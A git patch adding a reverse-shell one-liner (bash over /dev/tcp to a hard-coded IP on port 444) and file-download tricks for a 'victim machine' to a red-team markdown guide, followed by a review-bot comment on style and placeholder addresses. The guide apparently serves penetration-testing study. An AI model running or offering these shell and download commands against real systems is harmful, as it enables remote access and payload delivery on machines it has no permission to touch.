From 06210e1e0f8107df953761b96da679d092649256 Mon Sep 17 00:00:00 2001 From: Andres Hermosilla Date: Wed, 6 Sep 2017 16:47:50 -0700 Subject: [PATCH] Added reverse shell, downloading content to security red team guide --- security-red-team.md | 29 ++++++++++++++++++++++++++++- 1 file changed, 28 insertions(+), 1 deletion(-) diff --git a/security-red-team.md b/security-red-team.md index 84ebb0f..2e893b5 100644 --- a/security-red-team.md +++ b/security-red-team.md @@ -9,4 +9,31 @@ - http://seclist.us/pyjenkinstoolkit-is-a-jenkins-penetration-test-toolkit.html - https://pen-testing.sans.org/blog/2017/02/02/pen-test-poster-white-board-bash-bashs-built-in-netcat-client - https://www.pentesterlab.com/exercises/play_xxe/course -- https://www.hackthissite.org/ \ No newline at end of file +- https://www.hackthissite.org/ +- https://securityreliks.wordpress.com/2010/08/20/devtcp-as-a-weapon/ +- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet +- https://tools.kali.org/information-gathering/enum4linux + + +### Reverse Shell +```shell +# Reverse shell with your attacking box is listening on port 444 +/bin/bash -i > /dev/tcp/64.228.93.35/444 0<&1 2>&1 +``` + +### Download Files +You may not always have `curl` or `wget` available to download files on the victim machine. + +```shell +exec 3<>/dev/tcp/ahermosilla.com/80 +echo -e "GET / HTTP/1.1\r\nHost: ahermosilla.com\r\nConnection: close\r\n\r\n" >&3 +cat <&3 + +# Python 3.x +python -c 'import urllib.request; urllib.request.urlopen("http://example.com/").read()' + +# Python 2.7 +python -c 'import urllib2; print urllib2.urlopen("http://example.com/").read()' +``` +- https://stackoverflow.com/questions/645312/what-is-the-quickest-way-to-http-get-in-python +- http://xmodulo.com/tcp-udp-socket-bash-shell.html \ No newline at end of file
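Review bot: The Python 3.x one-liner under "Download Files" discards the response: it calls `.read()` without printing or writing the result, while the Python 2.7 line prints it. Wrap the call in `print(...)` so both variants behave the same. In the same hunk, the "Reverse Shell" block hard-codes a routable address (`64.228.93.35`) and the `/dev/tcp` download example a personal domain (`ahermosilla.com`); a shared guide is better served by documentation placeholders such as `192.0.2.1` (RFC 5737) and `example.com`, which the Python lines already use. The comment "Reverse shell with your attacking box is listening on port 444" is ungrammatical; something like "Reverse shell; your listener is on port 444" reads cleanly. The two links added after the closing fence sit under "Download Files" with no label, so consider moving them up into the reference list at the top of the hunk, and the file still ends without a trailing newline.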